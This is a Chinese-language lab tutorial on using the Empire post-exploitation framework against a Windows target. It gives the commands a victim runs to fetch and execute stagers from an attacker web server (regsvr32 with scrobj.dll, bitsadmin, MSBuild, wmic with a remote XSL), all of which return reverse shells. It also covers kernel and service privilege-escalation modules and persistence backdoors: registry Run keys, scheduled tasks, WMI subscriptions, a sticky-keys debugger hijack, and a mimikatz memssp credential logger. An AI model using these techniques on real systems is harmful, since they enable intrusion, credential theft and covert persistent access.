内网渗透 day15-empire(usestager用法、提权、持久化后门）

empire(usestager用法、提权、持久化后门）

本章前提：已成功设置监听器(如何设置监听器请看day14篇)

1. usestager的几种用法

windows/launcher_sct:

介绍:Regsvr32命令用于注册COM组件，是Windows系统提供的用来向系统注册控件或者卸载控件的命令，以命令行方式运行。WinXP及以上系统的regsvr32.exe在windows\system32文件夹下；2000系统的regsvr32.exe在winnt\system32文件夹下。

用法:regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname

1) usestager windows/launcher_sct     进入windows/launcher_sct模块

2) 设置一下参数

set Listener kali set OutFile /var/www/html/xx.sct

3) execute  执行

4) 在靶机上运行 regsvr32 /u /n /s /i:http://192.168.227.129/xx.sct scrobj.dll

5) 成功返回会话

windows/launcher_vbs:

远程下载：bitsadmin /transfer /n http://IP/xx.vbs path

1) usestager windows/launcher_vbs     进入windows/launcher_vbs模块

2) 设置一下参数

3) execute  执行

4) 在靶机上运行

bitsadmin /transfer n http://192.168.227.129/xx.vbs C:\Users\xxx\Desktop\xx.vbs

5) 靶机执行.vbs文件，成功反弹会话

windows/launcher_xml:

MSBuild是一个免费的开源构建工具集，用于管理本地C++代码.在Visual Studio2013以前,MSBuild是做为.NET框架的一部分,可是在其以后,MSBuild被绑定到了Visual Studio.因此,Visual Studio依赖于MSBuild，可是MSBuild并不依赖于Visual Studio。

用法:利用net4.0以后的版本中的MSBuild运行注入shellcode的xml文件反弹shell。

1) 跟前面两个操做同样生成xml文件到/var/www/html/文件夹下

2) 在靶机上下载该文件

3) 在靶机上cd到C:\Windows\Microsoft.NET\Framework64\v4.0.30319\使用MSBuild运行xml

4) 成功反弹会话

windows/wmic:

WMIC扩展WMI（Windows Management Instrumentation，Windows管理工具） ，提供了从命令行接口和批命令脚本执行系统管理的支持。

用法:wmic os get /format:"http://IP/xx.xsl"

1) 跟前面两个的操做步骤同样将生成的xsl存到html文件夹下

2) 在靶机上执行wmic os get /format:"http://192.168.227.129/xx.xsl"

3) 成功反弹会话

2. empire提权模块

uac和bypassuac在day14有介绍

本地提权

ms16-135：Win32k 信息泄漏漏洞

若要利用此漏洞，攻击者必须登陆到受影响的系统并运行经特殊设计的应用程序。此安全更新 程序经过更正 Windows 内核处理内存地址的方式来修复这个漏洞。

searchmodule ms16-135 查找ms16-135模块

usemodule privesc/ms16-135    使用模块

设置完参数后执行

成功反弹拥有特权的会话

ms16-032：辅助登陆特权提高漏洞

若是 Windows 辅助登陆服务未能正确管理内存中的请求句柄，Microsoft Windows 中会存在 一个特权提高漏洞。 成功利用此漏洞的攻击者可以以管理员身份运行任意代码。

usemodule privesc/ms16-032    使用模块

设置完参数执行

成功返回有系统特权的会话

powershell/privesc/sherlock 查找Windows本地特权升级漏洞

usemodule privesc/sherlock  使用该模块

显示本地特权升级的漏洞

利用powerup进行提权

PowerUp是一个PowerShell工具，可协助Windows系统上的本地特权升级。它包含多种方法来 识别和滥用易受攻击的服务，以及DLL劫持机会，易受攻击的注册表设置和升级机会。它是PowerTools 的一部分，位于https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp。Empire 在privesc / powerup / *模块中实现了PowerUp的升级功能 。

usemodule privesc/powerup/allchecks 检测是否能够利用powerup漏洞

显示存在漏洞

根据显示存在的漏洞利用对应模块

能够看到存在对服务可执行文件的配置不当权限（可经过service_exe_ *加以利用）

不过这边我都试过了一遍，不是很好用

3. 持久化后门

PowerBreach

介绍:PowerBreach是一系列内存中的PowerShell后门，可为各类选项提供触发器。

persistence/powerbreach/deaduser –接受用户名和关于用户名是不是域名（相对于本地账户）的开关/标志。脚本每隔Sleep秒就会检查账户是否仍然存在，若是不存在则触发登台逻辑。该后门不须要本地管理员权限。

理解:判断你设置的用户名是否存在（有没有被更名或者删除），当被更名的时候会就触发该脚本反弹shell

usemodule persistence/powerbreach/deaduser 使用模块

查看所需参数

设置相关参数

执行

把aaa改为了bbb

成功反弹shell

persistence/powerbreach/eventlog - 事件日志–按时间间隔查询安全事件日志，以查找具备惟一触发器值的事件。此后门DOES须要管理员权限才能访问安全事件日志。

usemodule persistence/powerbreach/eventlog* 使用模块

查看所需参数

设置相关参数

执行

打开靶机的eventvwr，当安全日志中存在HACKER(上面参数定义的能够本身更改)关键字时

成功反弹会话

因为是管理员权限留下的后门，因此返回的会话也拥有管理员权限

persistence/powerbreach /resolver –须要解析的主机名和触发IP。脚本每隔睡眠秒数检查一次主机名是否解析为触发IP，不然将触发暂存逻辑。该后门不须要本地管理员权限。

usemodule persistence/powerbreach/resolver 使用模块

查看所需参数

设置相关参数

执行

靶机上去访问一下127.0.0.1，让他进行解析

成功反弹shell

Userland

persistence/userland/ * 模块容许用户态，从重启的持久性（即无需管理权限）。若是指定了侦听器，则会自动生成Empire代理的登台代码并将其用做触发的脚本逻辑。

persistence/userland /registry –在HKCU:Software\Microsoft\Windows\CurrentVersion\Run中设置一个值，以在选择的任何存储机制下执行脚本。仅当该用户登陆时，这将致使脚本运行。

usemodule persistence/userland/registry 使用模块

查看所需参数

设置相关参数

执行

将靶机注销从新登陆，成功返回shell会话（这里用户登陆的时候会有短暂的powershell弹框）

persistence/userland/schtask –配置计划的任务以在选择任何存储机制的状况下执行脚本。该脚本能够在DailyTime（HH：mm格式）下触发，或者在用户闲置IdleTime秒后触发

理解:这个是放注册表中的计划任务

usemodule persistence/userland/schtasks 使用模块

查看所需参数

设置相关参数

执行

将靶机注销从新登陆，等设置的时间到，成功返回shell会话

Elevated

persistence/elevated/*模块容许重启的持久性从升高的上下文（即具备管理特权）。若是指定了侦听器，则会自动生成Empire代理的登台代码并将其用做触发的脚本逻辑。

理解:该模块是拥有管理员权限留下的拥有权限的后门

persistence/elevated/registry、persistence/elevated/schtask，这两个用法和以前的同样，只不过须要管理员权限

persistence/elevated/wmi–配置永久WMI订阅以激发存储的脚本逻辑。该脚本能够在DailyTime（HH：mm格式）或使用AtStartup启动系统时触发。这具备难以检测/去除的等级。

理解:这个是放注册表中的计划任务

usemodule persistence/elevated/wmi* 使用模块

查看所需参数

设置相关参数

执行

将靶机上验证wmi，在powershell中直接输入Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter “Name=’Updater’”

重启靶机，成功反弹有管理员权限的shell

misc

persistence/misc/debugger*-在empire3.6.0版本中把persistence/ debugger / * 模块整合到了persistence/misc/debugger*模块中。您能够为RDP提示符下登陆前可访问的各类可执行文件设置“映像文件执行选项”（又名调试器）。默认状况下，调试器设置为cmd.exe，它使您能够触发经过RDP以SYSTEM身份运行的命令提示符，而无需实际登陆计算机。您还可使用Binary参数指定另外一个二进制文件的路径。若是要调试器触发暂存器，请设置Listener参数。这将为指定的侦听器生成一个合适的暂存器，并将其存储到指定的RegPath中。而后，您能够从RDP提示预身份验证中触发这些登台程序，可是请注意，一旦关闭RDP提示（在不活动30秒后发生），登台的代理将被杀死。

usemodule persistence/misc/debugger* 使用模块

查看所需参数

设置参数

执行

在靶机win7登陆界面按5次shift，有个powershell的框一闪而过

成功返回会话，而且是管理员权限

persistence/misc/memssp –安装Mimikatz的memssp模块，该模块应将全部身份验证事件注销到C：\ Windows \ System32 \ mimisla.log。应该从新引导持久。

usemodule persistence/misc/memssp* 使用模块

直接运行就能够了

靶机对应目录生成了mimisla.log文件

persistence/misc/disable_machine_acct_change –禁止目标更改其计算机账户密码。若是首先运行mimikatz/credentials/logonpasswords来转储计算机账户密码（账户以$结尾），则您应该具备对给定系统的持久访问权限。清理选项也可用。

使用该模块后直接运行就能够了